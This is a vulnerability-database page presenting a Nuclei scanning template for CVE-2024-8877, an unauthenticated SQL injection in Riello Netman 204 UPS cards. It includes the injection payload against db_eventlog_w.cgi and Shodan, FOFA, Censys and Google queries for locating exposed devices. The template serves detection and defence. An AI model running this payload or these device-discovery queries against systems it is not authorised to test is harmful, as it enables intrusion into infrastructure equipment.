| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Netman 204 4.05 SQL Injection / Unauthenticated Password Reset Vulnerabilities | 24 Sep 202400:00 | – | zdt | |
| CVE-2024-8877 | 25 Sep 202404:16 | – | circl | |
| RIELLO UPS NetMan SQL注入漏洞 | 25 Sep 202400:00 | – | cnnvd | |
| CVE-2024-8877 | 24 Sep 202415:19 | – | cve | |
| CVE-2024-8877 SQL Injection | 24 Sep 202415:19 | – | cvelist | |
| CVE-2024-8877 | 25 Sep 202401:15 | – | nvd | |
| Netman 204 4.05 SQL Injection / Unauthenticated Password Reset | 24 Sep 202400:00 | – | packetstorm | |
| CVE-2024-8877 | 23 May 202509:05 | – | redhatcve | |
| Critical Flaws in Tank Gauge Systems Expose Gas Stations to Remote Attacks | 30 Sep 202411:55 | – | thn | |
| VulnCheck KEV: CVE-2024-8877 | 15 Oct 202400:00 | – | vulncheck_kev |
id: CVE-2024-8877
info:
name: Riello Netman 204 - SQL Injection
author: s4e-io
severity: critical
description: |
The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.
impact: |
Unauthenticated attackers can exploit SQL injection to modify collected log data, extract sensitive information, and potentially gain complete control of the Netman 204 device through multiple vulnerable CGI endpoints.
remediation: |
Apply security patches from Riello for Netman 204 firmware to address the SQL injection vulnerabilities in db_datalog_w.cgi, db_eventlog_w.cgi, and db_multimetr_w.cgi endpoints.
reference:
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-riello-netman-204/index.html
- https://0day.today/exploit/39757
- https://nvd.nist.gov/vuln/detail/CVE-2024-8877
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-8877
cwe-id: CWE-89
epss-score: 0.7703
epss-percentile: 0.99494
cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: riello-ups
product: netman_204_firmware
shodan-query: title:"netman 204"
fofa-query: title="netman 204"
censys-query: services.http.response.body:"netman204"
google-query: intitle:"netman 204"
tags: cve,cve2024,netman,sqli,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "START APPLICATION", "category\":", "codeStr\":")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022030e594a5e3235677ed7d56b8010fb4018e0a8de7cfc75951211a852c262b5460022100934e7b7da69dcf4a8587d7aa58168c95d391dd9bf9c59f1b871ccd1277b4ed42:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation